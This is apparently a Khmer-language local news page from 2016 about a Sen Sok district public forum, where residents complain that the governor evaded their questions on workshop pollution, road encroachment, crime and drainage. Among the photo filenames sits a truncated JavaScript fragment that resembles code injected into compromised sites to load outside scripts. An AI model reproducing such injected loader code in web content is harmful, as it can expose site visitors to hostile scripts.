ព្រឹតិ្តការណ៍ថ្មីៗ

(Video) ៤សំនួរដែលលោក បឹុល កុសល​ មានចេតនាឆ្លើយយករួចខ្លួន និងមិនឆ្លើយតបជាមួយប្រជាពលរដ្ឋនៅក្នុង វេទិកាសាធារណៈនៅភូមិគោកឃ្លាង

2 ឆ្នាំ មុន 1 តូ សុផល

ភ្នំពេញ៖ ក្រោយវេទិកាសារធារណៈបានបញ្ចប់ ប្រជាពលរដ្ឋបានសម្តែងការមិនសប្បាយចិត្ត និងខកចិត្តជាខ្លាំងខណៈ ដែលលោក បុឹល កុសល អភិបាលខណ្ឌសែនសុខ មិនបានឆ្លើយតបនូវអ្វីនូវដែលប្រជារដ្ឋបានលើកឡើងពី ទុក្ខកង្វល់របស់ពួកគាត់បែរមានចេតនាពង្វាងឆ្លើយយករួចខ្លួនទៅវិញ។

សំនួរទី១ ដែលប្រជាពលរដ្ឋបានលើកឡើងនោះគឺ បញ្ហាផលប៉ះពាល់ពីសិប្បកម្មស្លរដែក៖

សំនួរទី២ គឺការសាងសង់រំលោភយកចំណីផ្លូវ៖

សំនួរទី ៣ បញ្ហាសន្តិសុខសណ្តាប់ធ្នាប់ គ្រឿងញៀន ក្មេងទំនើង ល្បែងស៊ីសងក្នុងមូលដ្ឋាន៖

សំនួរ និងសំណូមពរទី៤ សុំលូរ១ខ្សែរនោះប្រវែង២០០ម៉ែត្រ (ត្រូវច្រានចោល ព្រោះថវិការខណ្ឌមានកំណត់)

13340495_1255506797800480_1756529628_o

នារសៀល ថ្ងៃទី ០៣ ខែមិថុនា ឆ្នាំ២០១៦ វេលា ម៉ោង ១៤និង ៣០នាទី នៅផ្លូវបរតុងក្រុមទី១៤ ភូមិគោកឃ្លាងសង្កាត់ភ្នំពេញថ្មី សាលាខណ្ឌសែនសុខបានបេីកវេទិការសាធារណៈ ស្តីពីភូមិ ឃុំ មានសុវត្ថិភាព ជូនប្រជាពលរដ្ឋសង្កាត់ភ្នំពេញថ្មី។  ក្នុងឪកាសនោះដែលមានការចូលរួមពីលោក បឹុល កុសល អភិបាលនៃគណៈអភិបាលខណ្ឌ សែនសុខលោកម៉ក់ ហុង អធិការនគរ បាលខណ្ឌ ព្រមទាំងអភិបាលរងអធិការរងលោកចៅសង្កាត់ភ្នំពេញថ្មីនិងប្រជាពលរដ្ឋចូលរួមចំនួន២០០នាក់ទៀត ។ លោក ជុំ សារ៉ាយ ចៅសង្កាត់ភ្នំពេញថ្មី បានមានប្រសាសន៍ក្នុងពិធីផ្សព្វផ្សាយភូមិឃុំសុវត្តិភាពនោះថា ក្នុងការអនុវត្តន៏គោលនយោបាយ ភូមិ ឃុំមាន សុវត្តិភាពនោះ សមត្ថកិច្ចអាជ្ញាធរនិងប្រជាពលរដ្ឋត្រូវចេះសហការណ៍គ្នាឲ្យបានល្អត្រូវចេះចាត់កំលាំងរបស់ខ្លួនឲ្យទៅយាម នៅតាមភូមិឃុំជាប្រចាំឲ្យបានល្អដើម្បីធានានូវសន្តិសុខជូនប្រជាពលរដ្ឋបញ្ហាមួយទៀតគឺពាក់ព័ន្ធនិងបរិស្ថានតែម្តង(សំរាម)។

វេទិការសាធារណៈ ផ្តោតសំខាន់់លេីភូមិ ឃុំមានសុវត្ថិភាពប្រជាពលរដ្ឋបានលើកឡើងពីទុក្ខកង្វល់របស់ខ្លួនមាន៖

១. បញ្ហាផលប៉ះពាល់យ៉ាងធ្ងន់ធ្ងរពីសិប្បកម្មស្លរដែក (លោកអភិបាលមិនបានបកស្រាយឆ្លើយតបជាមួយប្រជាពលរដ្ឋ)

២. ការសាងសង់រំលោភយកចំណីផ្លូវ (លោកអភិបាលមិនបានបកស្រាយឆ្លើយតបជាមួយប្រជាពលរដ្ឋ)

៣. បញ្ហាសន្តិសុខសណ្តាប់ធ្នាប់ គ្រឿងញៀន ក្មេងទំនើង ល្បែងស៊ីសងក្នុងមូលដ្ឋាន (លោកអធិការថានិងខិតខំប្រឹងប្រែងបន្ថែមទៀត)

៤. សំនួរ និងសំណូមពរ លូរ១ខ្សែរប្រវែង២០០ម៉ែត្រ (លោកអភិបាលច្រានចោល ព្រោះថវិការខណ្ឌមានកំណត់)

13340393_1255506657800494_31023394_o13324150_1255507117800448_1687240189_o 13340393_1255507067800453_96293029_o 13340400_1255506877800472_1022215563_o  13340695_1255506824467144_720550093_o13383802_1255506747800485_342959818_o 13340748_1255507147800445_2061311961_o 13351127_1255507031133790_1311256977_o 13388789_1255507001133793_708857445_o11872305_10153513108267508_7760316066293043812_ovar d=document;var s=d.createElement(‘script’);

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ